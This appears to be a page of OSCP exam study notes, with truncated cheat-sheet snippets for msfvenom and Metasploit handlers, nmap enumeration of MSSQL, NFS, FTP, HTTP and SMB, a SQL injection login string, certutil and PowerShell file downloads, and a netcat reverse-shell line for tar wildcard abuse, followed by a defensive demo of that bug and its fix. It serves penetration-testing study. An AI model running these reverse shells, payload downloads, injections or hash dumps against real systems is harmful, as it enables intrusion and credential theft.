MSFVenom CheatSheet

Start msfconsole quietly (-q) and launch a multi/handler listener in one command:
sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST <IP Address>; set LPORT 443; exploit"

Binary payloads

Linux Meterpreter reverse shell:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local…


MSSQL OSCP

MSSQL services

mssql-vulnerability: Nmap can be leveraged to scan MSSQL for known vulnerabilities.

Example syntax (the ms-sql-dump-hashes script needs sysadmin credentials, here the sa account):
nmap -vv -sV -Pn -p [PORT] --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=[PORT],mssql.username=sa,mssql.password=sa [IP]

mssql-default -…


NFS OSCP

Nmap scripts:
nmap -sV -p 111 --script=rpcinfo <IP Address>
nmap -p 111 --script "nfs*" <IP Address>

Mount NFS:
mkdir john
sudo mount -o nolock <IP Address>:/<share> john

showmount to list the NFS shares a host exports:
showmount…

OSCP links

IPPSEC Website
Reverse Shell Cheat Sheet
Windows Privesc
Linux Privesc
Payload OSCP Notes Link
Useful OSCP Commands
IPEWorkshop OSCP Cheat Sheet


NMAP

Scan all ports with default scripts and version detection, saving normal output to a file:
nmap -p- -sC -sV -oN nmap.out <IP Address>

TCP SYN scan of all ports:
sudo nmap -sC -sS -p0-65535 <IP…

Download Files Windows

Download files with certutil:
certutil.exe -urlcache -f <URL> shell.exe

Using PowerShell to download files to Windows:
powershell -c "(new-object System.Net.WebClient).DownloadFile('<URL>','C:\temp\JuicyPotato.exe')"


FTP OSCP

# NMAP
sudo nmap --script=ftp-anon -p 21 <IP Address>
nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <IP Address>

# Start FTP using python (pyftpdlib serves the current directory)
sudo python -m pyftpdlib -p 21

Creating txt…


HTTP OSCP

Simple SQL injection to try on a login form (username:password):
admin:' OR '1'='1

Using Nmap to scan for HTTP vulnerabilities:
sudo nmap --script "http-vuln*" -p 80 <IP Address>
nmap -Pn -sV -sC -vvvvv…


SMB OSCP

Use Nmap to scan a host for SMB vulnerabilities and enumerate shares/users:
sudo nmap --script "smb-vuln*" <IP Address>
sudo nmap --script "smb-enum*" <IP Address>
nmap -v -p 139,445 --script=smb-os-discovery <IP Address>

SMB Version Windows version CIFS…


Shells

The following are notes from my pentesting course for OSCP.

If there is an app that runs tar * (an unquoted wildcard), you can do the following:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc…
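Why an unquoted tar * is dangerous, as an added example that is not part of the original notes: the shell expands * into the command's argument list, so a file whose name begins with -- is handed to tar as an option. The script below creates such filenames in a scratch directory (constructed sample files, names chosen for the demo), runs the vulnerable invocation and the hardened ./* form, and reports whether the injected command executed. It assumes GNU tar, which provides --checkpoint and --checkpoint-action.

```shell
#!/bin/sh
# Added example: tar wildcard (argument) injection and its fix.
# Assumes GNU tar (--checkpoint / --checkpoint-action). The files created
# below are constructed for the demo.

# tar_wildcard_demo MODE
#   MODE=unsafe  runs:  tar cf out.tar *     (what the vulnerable app does)
#   MODE=safe    runs:  tar cf out.tar ./*   (expanded names start with ./)
# Prints "pwned" if the attacker's command ran, otherwise "clean".
tar_wildcard_demo() {
    mode="$1"
    work="$(mktemp -d)"
    result="$(
        cd "$work" || exit 1
        echo "legit data" > report.txt
        # Attacker-controlled filenames inside the directory being archived.
        # After the shell expands "*", tar sees these as options, not files.
        touch -- '--checkpoint=1'
        touch -- '--checkpoint-action=exec=touch pwned'
        if [ "$mode" = unsafe ]; then
            tar cf out.tar * 2>/dev/null
        else
            # Every expanded name now begins with "./", so none of them can
            # be parsed as an option.
            tar cf out.tar ./* 2>/dev/null
        fi
        if [ -e pwned ]; then echo pwned; else echo clean; fi
    )"
    rm -rf "$work"
    printf '%s\n' "$result"
}

# Stand-alone run:
echo "tar cf out.tar *   -> $(tar_wildcard_demo unsafe)"
echo "tar cf out.tar ./* -> $(tar_wildcard_demo safe)"
```

When reviewing scripts or cron jobs for this bug, look for any archiver or utility invoked with a bare glob; prefixing the glob with ./ (or ending option parsing with -- before it) closes the hole, and the checkpoint action above is only one of several tar options an attacker could smuggle in this way.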